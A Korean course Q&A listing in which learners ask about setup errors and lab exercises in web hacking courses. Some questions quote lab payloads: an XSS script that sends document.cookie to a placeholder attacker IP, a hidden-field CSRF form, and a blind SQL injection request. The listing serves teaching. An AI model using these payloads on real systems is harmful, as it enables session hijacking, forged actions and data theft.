묻고 답해요
158만명의 커뮤니티!! 함께 토론해봐요.
인프런 TOP Writers
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
monitor 이 안 켜져요
계속 이 메세지만 뜨고 모니터가 열리지 않습니다
-
해결됨반드시 알고 넘어가야 할 웹 기술 기초편
자원을 지정하는 url 13:00
이 url에서 왜 첫 번째 &가 파라미터 값 대입인가요? =가 파라미터 값 대입 아닌가요?
-
미해결화이트해커가 되기 위한 8가지 웹 해킹 기술
한글 설치 저장소 위치
한글 깨짐을 위해nano /etc/apt/sources.list 에서deb http://httpredir.debian.org/debian jessie main non-free contrib 를작성했지만 다음과 같은 오류가 발생합니다.같은 질문을 하신 다른 분에 적힌 답변을 참고해보니강의해주신 때와 시간이 달라 다른 저장소 위치를 작성해야한다는 글을 보았습니다.어떤 저장소를 작성해야하는지 알 수 있을까요??
-
미해결오픈 소스 도구를 활용한 웹 해킹 및 스노트 분석(침해대응)
Rule update 문제
Rule update를 하면 Rules tarball download of emerging.rules.tar.gz....이런 문구만 계속 뜨네요인터넷은 연결되어 있는데 왜 안되는걸까요
-
미해결오픈 소스 도구를 활용한 웹 해킹 및 스노트 분석(침해대응)
Snorby 설치
securityonion에서 Snorby 설치할려고 github 입력해도 timeout 뜨면서 설치가 안되네요..
-
미해결오픈 소스 도구를 활용한 웹 해킹 및 스노트 분석(침해대응)
Marketplace에 beta portScanner가 없습니다.
zap 2.16버전을 다운받았는데 marketpalce에 portscanner, Active scanner rules(alpha) 가 없습니다.
-
미해결버그헌팅과 시나리오 모의해킹 전문가 되기
인터넷 연결문제
칼리리눅스 ping: connect: Network is unreachablenat 네트워크 설정 다 했는데도 이렇게 뜨네요 정말 모르겠습니다. 할 수 있는건 다 해봤습니다.
-
해결됨웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
sql injection 공격이 가능한 순간 다른 기법을 사용하는건 비효율적이지 않나요?
sql injection 공격이 가능하다면union 공격이 제일 효과적이라는 생각이 들었습니다.sql injection 공격이 가능한 순간 다른 기법을 사용하는건 비효율적이지 않나요?blind_Based가 유효한 더 실전적인 케이스가 궁금합니다.
-
해결됨웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
리피터 글자가 깨짐현상
리피터로 옮기고 send하면 강사님처럼 문구가 안뜨고 ㅁㅁㅁㅁㅁ ㅁㅁㅁㅁ ㅁㅁㅁㅁ 이렇게 뜹니다 무엇이 원인일련지요,, 환경은 버프스위트 내에 오픈브라우저로 접속했습니다 감사합니다.
-
미해결버그헌팅과 시나리오 모의해킹 전문가 되기
basic pentesting 2.ova IP설정
basic pentesting 2.ova 다운로드 받았는데, IP설정이 안되어 있습니다.IP설정하는 방법 안내 부탁드립니다.아니면, DHCP 설정되어 있는 ova파일 제공 부탁 드립니다.
-
해결됨웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
http://127.0.0.1/insecure_website/index.php 접속 에러 문제
이런 warning 에러 문구가 뜹니다.
-
해결됨웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
실습6-1] CSRF공격을 통한 게시글 무단작성에서 오류가 발생합니다.
<form action="http://172.30.1.22/insecure_website/action.php" method="POST" enctype="multipart/form-data"><input type="hidden" name="title" value="해커가 무단으로 작성!"><input type="hidden" name="password" value="test"><input type="hidden" name="content" value="해커닷"><input type="hidden" name="mode" value="write"><input type="submit"></form>이내용으로 게시글을 작성하면다음과 같이 나옵니다.actio.php에서 뭘 수정해야 할까요?
-
해결됨웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
세션 하이재킹 질문
127.0.0.1/session/session.php?session=test이것으로 rawdata.txt에날짜와 시간/ip주소/test는 잘 출력이 되었습니다.다른 웹브라우저에서 공격자id로 접속해서 다음과 같이 게시판을 작성하였으며 그때 ip주소를 어떻게 할당받는지가 궁금합니다.<script>location.href = "http://공격자ip/session/session.php?session=" + document.cookie</script>이 게시판의 내용은 rawdata.txt에 저장되지 않습니다.무엇이 잘못되었을까요?
-
해결됨모의해킹 실무자가 알려주는, 파일 다운로드 취약점 공격 기법과 실무 사례 분석
JasperException
안녕하세요, 코드를 실행시켰을 때 JasperException 오류가 발생하여 문의드립니다. 구글링 했을 때는 jsp 파일이 java로 변환되고 class 생성하는 과정에서 오류가 난다고 합니다. 그래서 WAS에서 오류를 해결할 수 있다고 하는데, 윈도우즈 환경에서 WAS를 어떻게 접근할 수 있는지 모르겠습니다.또한, WAS 말고도 다른 방법이 있는지 궁금합니다.제 코드와 오류를 첨부하겠습니다.감사합니다.<%@ page contentType="text/html; charset=UTF-8"%> <%@ page import="java.util.*;, java.io.*;" %> <% FileInputStream fis = null; <!-- fileInputStream은 1byte씩 부르게 됨 --> BufferedInputStream bis = null; <!-- 그래서 버퍼드 클래스를 사용하면 버퍼를 이용해서 바이트스트림을 쌓아두고 효율적으로 관리 가능능--> BufferedOutputStream bos = null; String path = "C:\\Program Files\\Apache Software Foundation\\Tomcat 9.0\\webapps\\ROOT\\upload\\image\\"; String org_filename = request.getParameter("org_filename"); <!-- get 메소드를 받아오는 게 아님. 그냥 입력값을 받는 것.--> String real_filename = request.getParameter("real_filename"); if(org_filename = null || real_filename = null) { out.println("<script>alert('파일명이 입력되지 않았습니다.');history.back(-1)</script>"); return; } try { File fd = new File(path + real_filename); if(!fd.exists()) { <!-- 파일이 없으면 --> out.println("<script>alert('파일이 존재하지 않았습니다.');history.back(-1)</script>"); return; } response.setHeader("Content-Type", "application/octect-stream"); <!-- 임의의 파일 --> response.setHeader("Content-Disposition", "attachment; filename=" + org_filename); <!-- 다운받을 때 셋팅되는 파일 이름--> <!-- 파일 -> Byte -> Buffer -> user --> fis = new FileInputStream(fd); <!-- 파일 객체가 들어와도 ㄱㅊ--> bis = new BufferedInputStream(fis); bos = new BufferedOutputStream(response.getOutputStream); byte[] buffer = new byte[1024]; int i = 0; <!-- bis에 있는 값을 buffer로 불러왔는데, 이제 옮길게 없다면 -1이 반환됨 --> while((i=(bis.read(buffer))) != -1) { bos.write(buffer, 0, i); } bos.flush(); } finally { <!-- 객체를 중지시키는 곳--> if(fis != null) <!-- 객체 생성이 제대로 되었다면--> fis.close(); if(bis != null) bis.close(); if(bos != null) bos.close(); } %>오류타입 예외 보고 메시지 org.apache.jasper.JasperException: java.lang.ClassNotFoundException: org.apache.jsp.download1_jsp 설명 서버가, 해당 요청을 충족시키지 못하게 하는 예기치 않은 조건을 맞닥뜨렸습니다. 예외 org.apache.jasper.JasperException: org.apache.jasper.JasperException: java.lang.ClassNotFoundException: org.apache.jsp.download1_jsp org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:589) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:425) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:376) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:324) javax.servlet.http.HttpServlet.service(HttpServlet.java:623) org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:51) 근본 원인 (root cause) org.apache.jasper.JasperException: java.lang.ClassNotFoundException: org.apache.jsp.download1_jsp org.apache.jasper.servlet.JspServletWrapper.getServlet(JspServletWrapper.java:197) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:413) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:376) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:324) javax.servlet.http.HttpServlet.service(HttpServlet.java:623) org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:51) 근본 원인 (root cause) java.lang.ClassNotFoundException: org.apache.jsp.download1_jsp java.base/java.net.URLClassLoader.findClass(URLClassLoader.java:445) org.apache.jasper.servlet.JasperLoader.loadClass(JasperLoader.java:129) org.apache.jasper.servlet.JasperLoader.loadClass(JasperLoader.java:58) org.apache.jasper.servlet.JspServletWrapper.getServlet(JspServletWrapper.java:192) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:413) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:376) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:324) javax.servlet.http.HttpServlet.service(HttpServlet.java:623) org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:51) 비고 근본 원인(root cause)의 풀 스택 트레이스를, 서버 로그들에서 확인할 수 있습니다.
-
해결됨웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
실습 2-9] request 수정하고 send를 눌렀는데 검색이 되지 않습니다.
GET /insecure_website/index.php?page=view&idx=14%20and%20length((select+jumin+customer_info+where+id='admin'))=14그 이전까지는 잘되었는데 이부분 부터 계속 안됩니다. 어디가 문제일까요?
-
미해결모의해킹 실무자가 알려주는, SQL Injection 공격 기법과 시큐어 코딩 : PART 1
업데이트 부탁드립니다.
안된다고 하시는 분들이 지금 너무 많습니다 저역시 2주 동안따라해봐도 환경 구성이 되질 않습니다. 지금 따라 하려니깐 되질 않습니다 다운이 받아 지지않는 버전도 있구요 그래서 xampp로 오라클연동하는 방법들을 알려주세요 업로드 해주셔도 감사할것같습니다
-
해결됨Skill-Up! 웹쉘 탐지 솔루션 우회를 위한, 웹쉘 난독화 기법
단순 강의 개설 문의
안녕하세요 강사님 강의가 매우 유익하여 강의랑은 별개의 내용으로 단순 질문이 있습니다.혹시 모바일 앱(IOS, Andriod)에 대한 취약점 진단 강의도 개설하실 의향이 있으실까요?
-
해결됨웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
CSRF 공격시 hidden 필드로 csrf 토큰도 넣어주면 가능하지 않을까요?
공격 스크립트에 CSRF 토큰도 필드로 입력시켜주면 안될까요.?그러면 세션에 유저의 CSRF 토큰값은 유지되고 파라미터로 넘길 CSRF 토큰도 유저의 토큰이어서 비교했을 때 같지 않을까요? 여기서 전제 조건은 유저의 CSRF토큰을 받을 수 있다는 건데 이건.. 어떻게 알 수 있을지 모르겠지만 안다고 가정하면? 될거 같다는 생각이 들었습니다.
-
미해결IT보안을 위한 와이어샤크 네트워크 패킷 분석 실전
강의자료 다운(패킷과 소스) 받으신분 어디서 받는건지좀 알려주세요
아무리 찾아 봐도 구름도 안보이고.ㅠ.ㅠ 다운을 받을 수 가 없네요
-
미해결무작정 따라하며 원리를 깨우치는 웹 해킹 : WebGoat 편
음서이 잘 안들립니다.
블루투스 이어폰 음성이 너무 작습니다.물리적 연결한 헤드폰에서는 잘들립니다.해결 가능할까요?
